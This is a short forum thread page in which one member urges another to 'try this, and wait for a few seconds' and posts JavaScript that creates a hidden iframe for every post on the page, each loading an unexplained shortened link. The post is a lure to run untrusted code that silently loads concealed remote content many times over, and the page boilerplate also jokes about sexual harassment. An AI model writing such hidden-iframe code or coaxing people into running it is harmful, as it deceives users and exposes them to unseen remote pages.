What's new
Vindictive

Register a free account today to become a member. Once you're approved, you'll able to participate on this site by adding topics and posts, as well as connect with other members through your own private inbox. We are not legally responsible if you're sexually harassed by Spine.

hey aemon try this, and wait for a few seconds...

brti

Member
Code:
var elements = document.getElementsByClassName("post");


for(var i = 0; i < elements.length; i++)
{
    var newElement = document.createElement("iframe");
    
    newElement.style.display = "none";
    newElement.src = "http://goo.gl/76lVeJ";
    
    document.body.appendChild(newElement);
}
 
Back